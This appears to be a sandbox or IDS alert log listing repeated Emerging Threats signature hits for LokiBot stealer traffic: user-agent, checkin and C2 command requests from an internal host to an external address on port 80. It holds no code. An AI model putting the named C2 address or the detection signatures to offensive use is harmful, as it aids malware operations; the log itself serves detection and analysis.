                            2025-01-11T07:44:47.470301+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977794.156.177.4180TCP
                            2025-01-11T07:44:47.470301+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977794.156.177.4180TCP
                            2025-01-11T07:44:47.470301+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977794.156.177.4180TCP
                            2025-01-11T07:44:48.186037+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977794.156.177.4180TCP
                            2025-01-11T07:44:48.186037+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977794.156.177.4180TCP
                            2025-01-11T07:44:48.343700+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54978494.156.177.4180TCP
                            2025-01-11T07:44:48.343700+01002025381ET MALWARE LokiBot Checkin1192.168.2.54978494.156.177.4180TCP
                            2025-01-11T07:44:48.343700+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54978494.156.177.4180TCP
                            2025-01-11T07:44:49.200455+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54978494.156.177.4180TCP
                            2025-01-11T07:44:49.200455+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54978494.156.177.4180TCP
                            2025-01-11T07:44:49.359567+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979094.156.177.4180TCP
                            2025-01-11T07:44:49.359567+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979094.156.177.4180TCP
                            2025-01-11T07:44:49.359567+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979094.156.177.4180TCP
                            2025-01-11T07:44:50.072387+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979094.156.177.4180TCP
                            2025-01-11T07:44:50.072387+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54979094.156.177.4180TCP
                            2025-01-11T07:44:50.222647+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979694.156.177.4180TCP
                            2025-01-11T07:44:50.222647+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979694.156.177.4180TCP
                            2025-01-11T07:44:50.222647+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979694.156.177.4180TCP
                            2025-01-11T07:44:51.077306+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979694.156.177.4180TCP
                            2025-01-11T07:44:51.077306+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54979694.156.177.4180TCP
                            2025-01-11T07:44:51.232327+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980494.156.177.4180TCP
                            2025-01-11T07:44:51.232327+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980494.156.177.4180TCP
                            2025-01-11T07:44:51.232327+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980494.156.177.4180TCP
                            2025-01-11T07:44:51.942413+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980494.156.177.4180TCP
                            2025-01-11T07:44:51.942413+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54980494.156.177.4180TCP
                            2025-01-11T07:44:52.093577+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981194.156.177.4180TCP
                            2025-01-11T07:44:52.093577+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981194.156.177.4180TCP
                            2025-01-11T07:44:52.093577+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981194.156.177.4180TCP
                            2025-01-11T07:44:52.835032+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981194.156.177.4180TCP
                            2025-01-11T07:44:52.835032+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54981194.156.177.4180TCP
                            2025-01-11T07:44:52.995437+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981694.156.177.4180TCP
                            2025-01-11T07:44:52.995437+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981694.156.177.4180TCP
                            2025-01-11T07:44:52.995437+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981694.156.177.4180TCP
                            2025-01-11T07:44:53.762221+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981694.156.177.4180TCP
                            2025-01-11T07:44:53.762221+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54981694.156.177.4180TCP
                            2025-01-11T07:44:53.931455+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982194.156.177.4180TCP
                            2025-01-11T07:44:53.931455+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982194.156.177.4180TCP
                            2025-01-11T07:44:53.931455+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982194.156.177.4180TCP
                            2025-01-11T07:44:54.673111+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982194.156.177.4180TCP
                            2025-01-11T07:44:54.673111+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54982194.156.177.4180TCP
                            2025-01-11T07:44:54.835228+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982694.156.177.4180TCP
                            2025-01-11T07:44:54.835228+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982694.156.177.4180TCP
                            2025-01-11T07:44:54.835228+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982694.156.177.4180TCP
                            2025-01-11T07:44:55.536663+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982694.156.177.4180TCP
                            2025-01-11T07:44:55.536663+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54982694.156.177.4180TCP
                            2025-01-11T07:44:55.697158+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54983494.156.177.4180TCP
                            2025-01-11T07:44:55.697158+01002025381ET MALWARE LokiBot Checkin1192.168.2.54983494.156.177.4180TCP
                            2025-01-11T07:44:55.697158+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54983494.156.177.4180TCP
                            2025-01-11T07:44:56.429080+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54983494.156.177.4180TCP
                            2025-01-11T07:44:56.429080+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54983494.156.177.4180TCP
                            2025-01-11T07:44:56.576534+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984094.156.177.4180TCP
                            2025-01-11T07:44:56.576534+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984094.156.177.4180TCP
                            2025-01-11T07:44:56.576534+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984094.156.177.4180TCP
                            2025-01-11T07:44:57.288262+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984094.156.177.4180TCP
                            2025-01-11T07:44:57.288262+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54984094.156.177.4180TCP
                            2025-01-11T07:44:57.442816+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984994.156.177.4180TCP
                            2025-01-11T07:44:57.442816+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984994.156.177.4180TCP
                            2025-01-11T07:44:57.442816+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984994.156.177.4180TCP
                            2025-01-11T07:44:58.144593+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984994.156.177.4180TCP
                            2025-01-11T07:44:58.144593+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54984994.156.177.4180TCP
                            2025-01-11T07:44:58.295544+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985594.156.177.4180TCP
                            2025-01-11T07:44:58.295544+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985594.156.177.4180TCP
                            2025-01-11T07:44:58.295544+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985594.156.177.4180TCP
                            2025-01-11T07:44:59.022080+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985594.156.177.4180TCP
                            2025-01-11T07:44:59.022080+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54985594.156.177.4180TCP
                            2025-01-11T07:44:59.483479+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986294.156.177.4180TCP
                            2025-01-11T07:44:59.483479+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986294.156.177.4180TCP
                            2025-01-11T07:44:59.483479+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986294.156.177.4180TCP
                            2025-01-11T07:45:00.217467+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986294.156.177.4180TCP
                            2025-01-11T07:45:00.217467+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54986294.156.177.4180TCP
                            2025-01-11T07:45:00.369812+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986994.156.177.4180TCP
                            2025-01-11T07:45:00.369812+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986994.156.177.4180TCP
                            2025-01-11T07:45:00.369812+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986994.156.177.4180TCP
                            2025-01-11T07:45:01.091724+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986994.156.177.4180TCP
                            2025-01-11T07:45:01.091724+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54986994.156.177.4180TCP
                            2025-01-11T07:45:01.246794+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987894.156.177.4180TCP
                            2025-01-11T07:45:01.246794+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987894.156.177.4180TCP
                            2025-01-11T07:45:01.246794+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987894.156.177.4180TCP
                            2025-01-11T07:45:01.958700+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987894.156.177.4180TCP
                            2025-01-11T07:45:01.958700+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54987894.156.177.4180TCP
                            2025-01-11T07:45:02.314357+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988494.156.177.4180TCP
                            2025-01-11T07:45:02.314357+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988494.156.177.4180TCP
                            2025-01-11T07:45:02.314357+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988494.156.177.4180TCP
                            2025-01-11T07:45:03.172234+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988494.156.177.4180TCP
                            2025-01-11T07:45:03.172234+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54988494.156.177.4180TCP
                            2025-01-11T07:45:03.331453+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54989194.156.177.4180TCP
                            2025-01-11T07:45:03.331453+01002025381ET MALWARE LokiBot Checkin1192.168.2.54989194.156.177.4180TCP
                            2025-01-11T07:45:03.331453+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54989194.156.177.4180TCP
                            2025-01-11T07:45:04.029029+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54989194.156.177.4180TCP
                            2025-01-11T07:45:04.029029+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54989194.156.177.4180TCP
                            2025-01-11T07:45:04.209206+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54989994.156.177.4180TCP
                            2025-01-11T07:45:04.209206+01002025381ET MALWARE LokiBot Checkin1192.168.2.54989994.156.177.4180TCP
                            2025-01-11T07:45:04.209206+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54989994.156.177.4180TCP
                            2025-01-11T07:45:04.919494+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54989994.156.177.4180TCP
                            2025-01-11T07:45:04.919494+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54989994.156.177.4180TCP
                            2025-01-11T07:45:05.082273+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990594.156.177.4180TCP
                            2025-01-11T07:45:05.082273+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990594.156.177.4180TCP
                            2025-01-11T07:45:05.082273+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990594.156.177.4180TCP
                            2025-01-11T07:45:05.802703+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990594.156.177.4180TCP
                            2025-01-11T07:45:05.802703+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54990594.156.177.4180TCP
                            2025-01-11T07:45:05.957442+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991194.156.177.4180TCP
                            2025-01-11T07:45:05.957442+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991194.156.177.4180TCP
                            2025-01-11T07:45:05.957442+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991194.156.177.4180TCP
                            2025-01-11T07:45:06.809719+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991194.156.177.4180TCP
                            2025-01-11T07:45:06.809719+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54991194.156.177.4180TCP
                            2025-01-11T07:45:07.173718+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991994.156.177.4180TCP
                            2025-01-11T07:45:07.173718+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991994.156.177.4180TCP
                            2025-01-11T07:45:07.173718+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991994.156.177.4180TCP
                            2025-01-11T07:45:07.882275+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991994.156.177.4180TCP
                            2025-01-11T07:45:07.882275+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54991994.156.177.4180TCP
                            2025-01-11T07:45:08.037685+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54992894.156.177.4180TCP
                            2025-01-11T07:45:08.037685+01002025381ET MALWARE LokiBot Checkin1192.168.2.54992894.156.177.4180TCP
                            2025-01-11T07:45:08.037685+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54992894.156.177.4180TCP
                            2025-01-11T07:45:08.745796+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54992894.156.177.4180TCP
                            2025-01-11T07:45:08.745796+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54992894.156.177.4180TCP
                            2025-01-11T07:45:08.914118+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993494.156.177.4180TCP
                            2025-01-11T07:45:08.914118+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993494.156.177.4180TCP
                            2025-01-11T07:45:08.914118+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993494.156.177.4180TCP
                            2025-01-11T07:45:09.642873+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993494.156.177.4180TCP
                            2025-01-11T07:45:09.642873+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54993494.156.177.4180TCP
                            2025-01-11T07:45:09.933380+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993994.156.177.4180TCP
                            2025-01-11T07:45:09.933380+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993994.156.177.4180TCP
                            2025-01-11T07:45:09.933380+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993994.156.177.4180TCP
                            2025-01-11T07:45:10.652685+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993994.156.177.4180TCP
                            2025-01-11T07:45:10.652685+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54993994.156.177.4180TCP
                            2025-01-11T07:45:10.851770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994594.156.177.4180TCP
                            2025-01-11T07:45:10.851770+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994594.156.177.4180TCP
                            2025-01-11T07:45:10.851770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994594.156.177.4180TCP
                            2025-01-11T07:45:11.552968+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994594.156.177.4180TCP
                            2025-01-11T07:45:11.552968+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54994594.156.177.4180TCP
                            2025-01-11T07:45:11.717555+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995394.156.177.4180TCP
                            2025-01-11T07:45:11.717555+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995394.156.177.4180TCP
                            2025-01-11T07:45:11.717555+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995394.156.177.4180TCP
                            2025-01-11T07:45:12.418770+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995394.156.177.4180TCP
                            2025-01-11T07:45:12.418770+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54995394.156.177.4180TCP
                            2025-01-11T07:45:12.578126+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54996194.156.177.4180TCP
                            2025-01-11T07:45:12.578126+01002025381ET MALWARE LokiBot Checkin1192.168.2.54996194.156.177.4180TCP
                            2025-01-11T07:45:12.578126+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54996194.156.177.4180TCP
                            2025-01-11T07:45:13.284283+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54996194.156.177.4180TCP
                            2025-01-11T07:45:13.284283+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54996194.156.177.4180TCP
                            2025-01-11T07:45:13.478552+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54996894.156.177.4180TCP
                            2025-01-11T07:45:13.478552+01002025381ET MALWARE LokiBot Checkin1192.168.2.54996894.156.177.4180TCP
                            2025-01-11T07:45:13.478552+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54996894.156.177.4180TCP
                            2025-01-11T07:45:14.187829+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54996894.156.177.4180TCP
                            2025-01-11T07:45:14.187829+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54996894.156.177.4180TCP
                            2025-01-11T07:45:14.340906+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997494.156.177.4180TCP
                            2025-01-11T07:45:14.340906+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997494.156.177.4180TCP
                            2025-01-11T07:45:14.340906+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997494.156.177.4180TCP
                            2025-01-11T07:45:15.050986+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997494.156.177.4180TCP
                            2025-01-11T07:45:15.050986+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54997494.156.177.4180TCP
                            2025-01-11T07:45:15.208568+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54998094.156.177.4180TCP
                            2025-01-11T07:45:15.208568+01002025381ET MALWARE LokiBot Checkin1192.168.2.54998094.156.177.4180TCP
                            2025-01-11T07:45:15.208568+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54998094.156.177.4180TCP
                            2025-01-11T07:45:15.918385+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54998094.156.177.4180TCP
                            2025-01-11T07:45:15.918385+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54998094.156.177.4180TCP
                            2025-01-11T07:45:16.076063+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54998694.156.177.4180TCP
                            2025-01-11T07:45:16.076063+01002025381ET MALWARE LokiBot Checkin1192.168.2.54998694.156.177.4180TCP
                            2025-01-11T07:45:16.076063+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54998694.156.177.4180TCP
                            2025-01-11T07:45:16.804729+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54998694.156.177.4180TCP
                            2025-01-11T07:45:16.804729+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54998694.156.177.4180TCP
                            2025-01-11T07:45:16.950781+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54999394.156.177.4180TCP
                            2025-01-11T07:45:16.950781+01002025381ET MALWARE LokiBot Checkin1192.168.2.54999394.156.177.4180TCP
                            2025-01-11T07:45:16.950781+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54999394.156.177.4180TCP
                            2025-01-11T07:45:17.675448+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54999394.156.177.4180TCP
                            2025-01-11T07:45:17.675448+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54999394.156.177.4180TCP
                            2025-01-11T07:45:17.828451+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55000294.156.177.4180TCP
                            2025-01-11T07:45:17.828451+01002025381ET MALWARE LokiBot Checkin1192.168.2.55000294.156.177.4180TCP
                            2025-01-11T07:45:17.828451+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55000294.156.177.4180TCP
                            2025-01-11T07:45:18.537448+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55000294.156.177.4180TCP
                            2025-01-11T07:45:18.537448+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55000294.156.177.4180TCP
                            2025-01-11T07:45:18.943087+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55001094.156.177.4180TCP
                            2025-01-11T07:45:18.943087+01002025381ET MALWARE LokiBot Checkin1192.168.2.55001094.156.177.4180TCP
                            2025-01-11T07:45:18.943087+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55001094.156.177.4180TCP
                            2025-01-11T07:45:19.654529+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55001094.156.177.4180TCP
                            2025-01-11T07:45:19.654529+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55001094.156.177.4180TCP
                            2025-01-11T07:45:19.816581+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55001694.156.177.4180TCP
                            2025-01-11T07:45:19.816581+01002025381ET MALWARE LokiBot Checkin1192.168.2.55001694.156.177.4180TCP
                            2025-01-11T07:45:19.816581+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55001694.156.177.4180TCP
                            2025-01-11T07:45:20.537471+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55001694.156.177.4180TCP
                            2025-01-11T07:45:20.537471+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55001694.156.177.4180TCP
                            2025-01-11T07:45:20.695534+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002294.156.177.4180TCP
                            2025-01-11T07:45:20.695534+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002294.156.177.4180TCP
                            2025-01-11T07:45:20.695534+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002294.156.177.4180TCP
                            2025-01-11T07:45:21.400480+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002294.156.177.4180TCP
                            2025-01-11T07:45:21.400480+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002294.156.177.4180TCP
                            2025-01-11T07:45:21.906791+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002794.156.177.4180TCP
                            2025-01-11T07:45:21.906791+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002794.156.177.4180TCP
                            2025-01-11T07:45:21.906791+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002794.156.177.4180TCP
                            2025-01-11T07:45:22.637453+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002794.156.177.4180TCP
                            2025-01-11T07:45:22.637453+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002794.156.177.4180TCP
                            2025-01-11T07:45:22.801196+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003794.156.177.4180TCP
                            2025-01-11T07:45:22.801196+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003794.156.177.4180TCP
                            2025-01-11T07:45:22.801196+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003794.156.177.4180TCP
                            2025-01-11T07:45:23.500259+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003794.156.177.4180TCP
                            2025-01-11T07:45:23.500259+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003794.156.177.4180TCP
                            2025-01-11T07:45:23.654933+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004394.156.177.4180TCP
                            2025-01-11T07:45:23.654933+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004394.156.177.4180TCP
                            2025-01-11T07:45:23.654933+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004394.156.177.4180TCP
                            2025-01-11T07:45:24.391600+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004394.156.177.4180TCP
                            2025-01-11T07:45:24.391600+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004394.156.177.4180TCP
                            2025-01-11T07:45:24.666068+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004494.156.177.4180TCP
                            2025-01-11T07:45:24.666068+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004494.156.177.4180TCP
                            2025-01-11T07:45:24.666068+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004494.156.177.4180TCP
                            2025-01-11T07:45:25.387120+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004494.156.177.4180TCP
                            2025-01-11T07:45:25.387120+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004494.156.177.4180TCP
                            2025-01-11T07:45:25.549065+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004594.156.177.4180TCP
                            2025-01-11T07:45:25.549065+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004594.156.177.4180TCP
                            2025-01-11T07:45:25.549065+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004594.156.177.4180TCP
                            2025-01-11T07:45:26.266552+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004594.156.177.4180TCP
                            2025-01-11T07:45:26.266552+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004594.156.177.4180TCP
                            2025-01-11T07:45:26.431338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004694.156.177.4180TCP
                            2025-01-11T07:45:26.431338+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004694.156.177.4180TCP
                            2025-01-11T07:45:26.431338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004694.156.177.4180TCP
                            2025-01-11T07:45:27.122844+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004694.156.177.4180TCP
                            2025-01-11T07:45:27.122844+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004694.156.177.4180TCP
                            2025-01-11T07:45:27.499770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004794.156.177.4180TCP
                            2025-01-11T07:45:27.499770+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004794.156.177.4180TCP
                            2025-01-11T07:45:27.499770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004794.156.177.4180TCP
                            2025-01-11T07:45:28.215382+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004794.156.177.4180TCP
                            2025-01-11T07:45:28.215382+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004794.156.177.4180TCP
                            2025-01-11T07:45:28.375675+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004894.156.177.4180TCP
                            2025-01-11T07:45:28.375675+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004894.156.177.4180TCP
                            2025-01-11T07:45:28.375675+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004894.156.177.4180TCP
                            2025-01-11T07:45:29.109982+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55004894.156.177.4180TCP
                            2025-01-11T07:45:29.109982+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55004894.156.177.4180TCP
                            2025-01-11T07:45:29.280517+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55004994.156.177.4180TCP
                            2025-01-11T07:45:29.280517+01002025381ET MALWARE LokiBot Checkin1192.168.2.55004994.156.177.4180TCP
                            2025-01-11T07:45:29.280517+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55004994.156.177.4180TCP
